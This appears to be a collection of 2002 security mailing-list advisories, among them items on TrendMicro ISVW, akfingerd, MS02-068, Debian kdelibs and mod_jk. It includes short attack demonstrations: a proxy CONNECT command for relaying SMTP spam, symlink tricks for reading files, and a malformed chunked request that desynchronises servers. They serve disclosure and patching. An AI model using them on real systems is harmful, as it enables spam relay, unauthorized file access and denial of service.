-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Greetings! A quite well known (i.e. ancient) type of proxy vulnerability was found for TrendMicro's InterScan VirusWall V3.6 This general problem has been known to be an issue with plain HTTP proxies like the Squid for ages (e.g. http://www.squid-cache.org/Doc/FAQ/FAQ-10.html#ss10.14). The vulnerability can be exploited using the CONNECT method to connect to a different server, e.g. an internal mailserver as port usage is completely unrestricted by the ISVW proxies V 3.6 Example: you = 6.6.6.666 Trendmicro ISVW = 1.1.1.1 (http proxy at port 80) Internal Mailserver = 2.2.2.2 connect with "telnet 1.1.1.1 80" to ISVW proxy and enter CONNECT 2.2.2.2:25 / HTTP/1.0 response: mail server banner - and running SMTP session e.g. to send SPAM from. You can connect to any TCP port on any machine the proxy can connect to. Telnet, SMTP, POP, etc. Solution: Update to ISVW 3.7 Build 1190 or newer (available since some weeks now). temp. Workarounds: - disable the HTTP proxy (safe but inconvenient) - You have a firewall that prevents unauthorized access to the Trend ISVW proxy, don't you? Volker Tanger IT-Security Consulting - -- discon gmbh Wrangelstraße 100 D-10997 Berlin fon+49 30 6104-3307 fax+49 30 6104-3461 [EMAIL PROTECTED] http://www.discon.de/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQE973gn0uordLlMxo4RArM4AJ0bMFRKrhuTa4+1jiBDjzwdDZYvdwCfdLNC JdU0ocAoE8/Kmzumk2k/NRQ= =C9cF -END PGP SIGNATURE-
Multiple vulnerabilities in akfingerd
PRODUCT. akfingerd (http://synflood.at/akfingerd/) EXPLOIT-ID. ECSC Ltd. Official K-R4d E-Security Advertisory. KR4D-VULN-ID-0-000-000-000-000-000-000-000-001 IMPORTANT SOUNDING DESCRIPTION. Akfingerd is a 'secure' finger server used by noone blah blah.. VERSIONS AFFECTED (to make it sound scientific). 0.5, probably all other versions, past and future. LIST OF K-RAD VULNS. 1. Remote user can cause DoS. To reproduce, simply connect to the finger server. For the duration of your connection, no one else can connect. 2. Local user can kill akfingerd. He must simply symlink his .plan file to /dev/urandom. He then fingers his user, while akfingerd is spewing the data, disconnect. Akfingerd fails to handle SIGPIPE properly and exits. 3. User can read files owned by user 'nobody'. ln -s /some/file ~/.plan. Then you can read files owned by nobody. Interestingly enough there is some weird code to lstat() the plan file first, then open it only if lstat() is successful. I have _NO IDEA_ what that is for 4. Fails to drop supplementary groups so using exploit 3 you can also read any file group readable by the root group (0) - or any other supplementary groups that root belongs to. VENDOR NOTIFICATION STATUS FULL DISCLOSURE-O-RAMA. I contacted the author months ago (probably more than a year now, I dont have a copy of the email anymore). My problem is that the blurb describes it as a 'secure' finger replacement. To which my only response is no, no it isn't. This software is unlikely to be in use by anyone, but it is interesting to see that that the hardest part of writing secure software is evidently fitting the word in to the title. Security through obscurity? Security through marketing. Unbreakable Trusted Computing(tm). PROOF-OF-CONCEPT HAIKU Connect to finger Stay connected, for a while Cherry blossom falls FIXES/WORKAROUNDS 10 PRINT Don't use it 20 GOTO 10 FINAL THOUGHTS. There are probably other exploits but the code is basically insecure by design and pretty much unsalvagable. That said, try as I might, I completely failed to find a 'cross site scripting' vulnerability in this software. DISCLAIMER (to make me sound sexy and dangerous). Any spelling mistakes are the responisibility of the reader. If you received this email in error then refer to terms and conditions in article 3a. in accordance with the 1972 electronic fraud act and section 1.1b of the Bulgarian obscene conduct in public statute. Your livestock are not affected. (most likely coming soon: akpop3d, tiny-cron, .*secure.*d(a)?emon$, etc etc...) -- // TEAM K-R4D-VULN (fanmail: kr4dvulns at ecsc dot co dot uk) ECSC Ltd. lynx --source www.scaramanga.co.uk/gianni-at-ecsc.asc | gpg --import 8646BE7D: 6D9F 2287 870E A2C9 8F60 3A3C 91B5 7669 8646 BE7D signature.asc Description: This is a digitally signed message part
Re: Fw: CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Circa 2002-12-02 10:03:20 -0800 dixit Muhammad Faisal Rauf Danka: : CERT Advisory CA-2002-34 Buffer Overflow in Solaris X Window Font Service : :Original release date: November 25, 2002 :Last revised: -- :Source: CERT/CC : :A complete revision history can be found at the end of this file. [...] : Overview : :The Solaris X Window Font Service (XFS) daemon (fs.auto) contains a :remotely exploitable buffer overflow vulnerability that could allow an :attacker to execute arbitrary code or cause a denial of service. [...] : Appendix A. - Vendor Information [...] : OpenBSD : :We do not have XFS. Not true. Observe: - cut here $ rsync -av --partial rsync://ftp3.usa.openbsd.org/ftp/3.2/i386/xbase32.tgz . Welcome to ftp.usa.OpenBSD.org in Boulder, CO. For other mirror sites visit http://www.openbsd.org/ftp.html _ _ _ / ___ \ | _ \ / | __ \ / / / /___ ___ | |_) | (___ | | | | / / / / __ \/ _ \/ __ \| _ < \___ \| | | | / /__/ / /_/ / __/ / / /| |_) |) | |__| | \_/ .___/\___/_/ /_/ |/|_/|_/ /_/ |.The proactively secure Unix-like . |L /| .Operating System. _ . |\ _| \--+._/| . Please visit the OpenBSD web site / ||\| Y J ) / |/| ./ at http://www.openbsd.org/ J |)'( |` F`.'/ -<| F __ .-< OpenBSD 3.2 has now been released! | / .-'. `. /-. L___ You can order a CD of OpenBSD 3.2 J \ <\ | | O\|.-' from http://www.openbsd.org/orders.html. _J \ .-\/ O | | \ |FCD sales are important to support the '-F -<_. \ .-' `-' L__ continued development of the project. __J _ _. >-' )._. |-' `-|.' /_. \_| F /.- ._.
Notes on MS02-068, extensive downplaying of severity
Following the release of the cumulative MS02-066 patch from the previous week, Microsoft has released yet another cumulative patch for Internet Explorer - MS02-068, which can be found at http://www.microsoft.com/technet/security/bulletin/MS02-068.asp The sole vulnerability that MS02-068 patches is the "external object caching" vulnerability discovered by GreyMagic Software. The rater surprising aspects of this bulletin is the extensive downplaying of severity and the incorrect mitigating factors. Microsoft has given this vulnerability a maximum severity rating of "Moderate". Great, so arbitrary command execution, local file reading and complete system compromise is now only moderately severe, according to Microsoft. Moving on to the technical description, we see yet more inaccuracies. The entire first paragraph is a falsum: "Exploiting the vulnerability could enable an attacker to read, but not change, any file on the user's local computer. In addition, the attacker could invoke an executable that was already present on the local system. The attacker would need to know the exact location of the executable, and would not be able to pass parameters to it. Microsoft is not aware of any executable that ships by default as part of Windows and, when run without parameters, could be dangerous. " Allow me to rephrase: Exploiting the vulnerability could enable an attacker to perform any action on the local computer that the user being exploited can perform. This includes, but is not limited to, reading and changing any file on the user's local computer, forcefully placing arbitrary files on the system in any location and invoking any executable on the system both with and without parameters. Further down we find yet more inaccuracies: "Without the ability to pass parameters, it's unlikely that an attacker could do much. For instance, although the attacker could run the command prompt, he couldn't pass a command (e.g., format c:) to it. " "This vulnerability provides no way for an attacker to transfer a program of their choice to the user's system. " Since we can already create and execute arbitrary command scripts on the machine, I fail to see how the above can be remotely accurate. Accomplishing this is as simple as creating and executing an automated FTP script, or merely recreating an EXE file from an embedded string in the HTML. Microsoft are very much aware of this, and even modified the MS02-066 bulletin (following the post from GreyMagic on Bugtraq) to provide assistance in mitigating how the HTML Help control can execute commands in the local zone. It seems like Microsoft are deliberately downplaying the severity of their vulnerabilities in an attempt to gain less bad press. It sure would look bad to release 2 critical cumulative updates in just 2 weeks, but that is exactly what has been done. As it stands now, the bulletin is released and most journalists willing to comment have already noticed the "Moderate" label and the extensive list of (incorrect) mitigating factors, and quite likely will not write anything on just how severe this really is. I doubt most people care to read the revisions to the bulletin that will come later. There are currently 18 unpatched publicly known vulnerabilities in Internet Explorer, of which I have labelled 6 as severe. http://www.pivx.com/larholm/unpatched/ Regards Thor Larholm, Security Researcher PivX Solutions, LLC Strike Now, StrikeFirst! http://www.pivx.com/sf.html
[SECURITY] [DSA 204-1] New kdlibs packages fix arbitrary program execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 204-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze December 5th, 2002 http://www.debian.org/security/faq - -- Package: kdelibs Vulnerability : arbitrary program execution Problem-Type : remote Debian-specific: no CVE Id : CAN-2002-1281 CAN-2002-1282 The KDE team has discovered a vulnerability in the support for various network protocols via the KIO The implementation of the rlogin and protocol allows a carefully crafted URL in an HTML page, HTML email or other KIO-enabled application to execute arbitrary commands on the system using the victim's account on the vulnerable machine. This problem has been fixed by disabling rlogin and telnet in version 2.2.2-13.woody.5 for the current stable distribution (woody) and in version 2.2.2-14.1 for the unstable distribution (sid). The old stable distribution (potato) is not affected since it doesn't contain KDE. This problem has been fixed by disabling rlogin and telnet in version 2.2.2-13.woody.5 for the current stable distribution (woody). The old stable distribution (potato) is not affected since it doesn't contain KDE. A correction for the package in the unstable distribution (sid) is not yet available. We recommend that you upgrade your kdelibs3 package immediately. wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_2.2.2-13.woody.5.dsc Size/MD5 checksum: 1353 a1ec9070e7c6001622ababe1e089175e http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_2.2.2-13.woody.5.diff.gz Size/MD5 checksum:38995 7b63146f3756571ffc7907d8b132e9ca http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs_2.2.2.orig.tar.gz Size/MD5 checksum: 6396699 7a9277a2e727821338f751855c2ce5d3 Architecture independent components: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs3-doc_2.2.2-13.woody.5_all.deb Size/MD5 checksum: 2567164 7ed60fb2a8aab2fadaea284b55af4cf2 Alpha architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dev_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 756862 d3e4c4f454a07dc6b67f4381647ada65 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs3_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 7532352 5c527c94140518e8104488bd44dcce0b http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs3-bin_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 137728 ec53f88c8d5d30f8ed2fee79a13600f3 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs3-cups_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 201564 26f95b365102bf651d8aab5c01cc31e8 http://security.debian.org/pool/updates/main/k/kdelibs/libarts_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 1019242 80fffa496319f117c6c146e74db751ea http://security.debian.org/pool/updates/main/k/kdelibs/libarts-alsa_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 1026754 954df79f21bb017ed37b5d7e750011a8 http://security.debian.org/pool/updates/main/k/kdelibs/libarts-dev_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 197818 a8938d049986d826a55e233e065d5c97 http://security.debian.org/pool/updates/main/k/kdelibs/libkmid_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 173658 b7b66df52c21b088f6c73072e09876ed http://security.debian.org/pool/updates/main/k/kdelibs/libkmid-alsa_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum: 176776 6d3df2f1c1b5b95b14b265cb1720f687 http://security.debian.org/pool/updates/main/k/kdelibs/libkmid-dev_2.2.2-13.woody.5_alpha.deb Size/MD5 checksum:36824 fe05cccfe6f741cae8661c16ad602a39 ARM architecture: http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs-dev_2.2.2-13.woody.5_arm.deb Size/MD5 checksum: 743060 642cd5da473ad4c65a3026a7ab8dd6c2 http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs3_2.2.2-13.woody.5_arm.deb Size/MD5 checksum: 6588608 e3c0d0dce80d28f1353b94f89aed3e2f http://security.debian.org/pool/updates/main/k/kdelibs/kdelibs3-bin_2.2.2-13.woody.5_arm.deb Size/MD5 checksum: 103710 c2157b3663ab88253799dcd42ada2489 http://security.debian.org/pool/updates/main/k/kdelibs/
Apache/Tomcat Denial Of Service And Information Leakage Vulnerability
-- __ Qualys Security Advisory QSA-2002-12-04 December 4th, 2002 Apache/Tomcat Denial Of Service And Information Leakage Vulnerability __ SYSTEMS AFFECTED: - mod_jk 1.2 using Apache Jserv Protocol 1.3 - Apache 1.3.x - Tomcat 4.x Server __ SYNOPSIS: The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for operating systems including UNIX and Windows NT. Apache has been the most popular web server on the Internet for the last 5 years. The Jakarta Project (http://jakarta.apache.org) creates and maintains open source solutions on the Java platform for distribution to the public at no charge. Tomcat 4 is the official Reference Implementation of the Servlet 2.3 and JavaServer Pages 1.2 technologies. Mod_jk is an apache module which allows apache to deliver web requests transparently to the tomcat engine. It supports serveral protocols, in particular the Apache Jserv Protocol 1.3 (AJP13). When these components are combined there exists an inconsistency in the communcation protocols implemented by mod_jk which allows amalicious user to desynchronise Apache-Tomcat communications and render the Tomcat service useless until the operator can intervene. The nature of the desynchronisation may also result in information leakage which may be used to collect private data from legitimate users of the site. RISK FACTOR: HIGH __ VULNERABILITY DETAILS: A client may connect to the target machine and deliver several requests with an invalid chunked encoded body e.g. GET /index.jsp HTTP/1.1 Host: victim.com Transfer-Encoding: Chunked 53636f7474 The request path is not relevant, after several requests like this are made the server becomes desynchronised and other users of the site will begin to see responses mixed between users. The site responses get desynchronised with the requests and the server becomes useless until either apache or tomcat are restarted. The reason this happens is that mod_jk misinterprets the chunked request, after sending the request to Tomcat via AJP13 it immediately sends a second zero length AJP13 packet (4 bytes - magic number + zero size). The tomcat server receives the first request and sends the response back over the connection. Upon receiving the second zero size packet it repeats the query, and again sends a second response back to mod_jk. Mod_jk is only expecting one valid response, so it pulls it off the wire and leaves the second response untouched. The next request which is sent over this connection (valid or invalid) will generate another response, however mod_jk pulls the old duplicate response off the wire and sends this back to the requesting agent. Essentially this desynchronises the queries and responses leaving the communication channel useless, furthermore, repeated requests will eventually fill up the network buffers resulting in the requests blocking and the server completely failing to respond. Mod_jk uses a pool of workers so a full scale denial of service would require desyncrhonising all of the workers using multiple requests. The Number of requests required to block a worker completely will depend on the size of the response and the network buffers. The potential for information leakage is great but the risk is mitigated somewhat by the unpredictability of the query-response desynchronisation. Depending on the target site this may be somewhat exploitable by a malicious user to redirect other users to a specific response by saturating the communcation channels with a desired response. __ RESOLUTION: Upgrade to mod_jk 1.2.1 http://jakarta.apache.org/builds/jakarta-tomcat-connectors/jk/release/v1.2.1/ __ CREDITS: The issue was analysed and documented by the Qualys Security Research Team based on a discovery by Grand Central Communications (www.grandcentral.com) while using the QualysGuard vulnerability detection Service. __ CONTACT: For more information about the Qualys Security Research Team, visit our website at http://www.qualys.com or send email to [EMAIL PROTECTED] __ LEGAL NOTICE: The information contained within this advisory is Copyright (C) 2002 Qualys Inc. It may be redistributed provided that no fee is charged for distribution and that the advisory is not modified in any way.